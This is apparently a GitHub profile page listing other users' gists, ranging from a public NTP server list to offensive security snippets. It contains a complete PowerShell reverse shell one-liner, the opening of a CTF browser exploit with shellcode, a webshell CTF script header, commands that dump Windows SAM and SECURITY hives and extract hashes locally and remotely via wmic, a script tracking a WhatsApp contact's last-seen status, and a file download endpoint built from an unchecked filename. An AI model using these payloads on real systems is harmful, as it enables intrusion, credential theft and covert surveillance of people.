Skip to content

Instantly share code, notes, and snippets.

View PacodiazDG's full-sized avatar
👀
RIP: 0000f43462463970 RSP: 0000f4577f3a4e58 RFLAGS: 00000246

Francisco Javier DLG PacodiazDG

👀
RIP: 0000f43462463970 RSP: 0000f4577f3a4e58 RFLAGS: 00000246
16 followers · 37 following
View GitHub Profile
@mutin-sa
mutin-sa / Top_Public_Time_Servers.md
Last active November 7, 2025 07:48
List of Top Public Time Servers

Google Public NTP [AS15169]:

time.google.com

time1.google.com

time2.google.com

time3.google.com

@ohpe
ohpe / RS.ps1
Last active October 14, 2024 19:46
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
@kasuken
kasuken / FileController.cs
Created January 25, 2018 07:24
Download and Upload files via Web API
[Route("api/[controller]")]
public class FilesController : ControllerBase
{
[HttpGet]
public async Task<IActionResult> Download(string filename)
{
if (filename == null)
return Content("filename not present");
var path = Path.Combine(Directory.GetCurrentDirectory(), "wwwroot", "download", filename);
@itszn
itszn / exploit.html
Last active April 9, 2021 18:31
34c3ctf V9 Exploit
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);
@nithindavid
nithindavid / last-seen-tracker-whatsapp.js
Created October 13, 2017 17:24
var snapeData = [new Date()];
var qu = $;
var _time = null;
var snape = setInterval(function() {
_time = qu('.pane-chat-header .chat-body .chat-main+div span');
if ( !!_time && snapeData[snapeData.length - 1].status !== _time.title) {
snapeData.push({
status: _time.title,
@WangYihang
WangYihang / base64-encoded-webshell.py
Last active November 29, 2021 08:55
#!/usr/bin/env python
# encoding:utf-8
# Author : WangYihang
# Date : 2017/10/03
# Email : [email protected]
# Comment : to solve XDCTF-2017-WEB-Upload
import string
import itertools
import os
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active May 14, 2025 19:15 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@Epivalent
Epivalent / Wannacrypt0r-FACTSHEET.md
Created May 12, 2017 20:17

WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Malware samples

@KbaHaxor
KbaHaxor / hashdump.reg
Created May 12, 2017 10:24 — forked from sh1n0b1/hashdump.reg
Windows local Hash Dump
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"
@JonnoFTW
JonnoFTW / blackbox.py
Last active January 14, 2023 20:37
#!/usr/bin/python2
#####################################NOTICE######################################
### This program is free software: you can redistribute it and/or modify ###
### it under the terms of the GNU General Public License as published by ###
### the Free Software Foundation, either version 3 of the License, or ###
### (at your option) any later version. ###
### This program is distributed in the hope that it will be useful, ###
### ###
### but WITHOUT ANY WARRANTY; without even the implied warranty of ###
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ###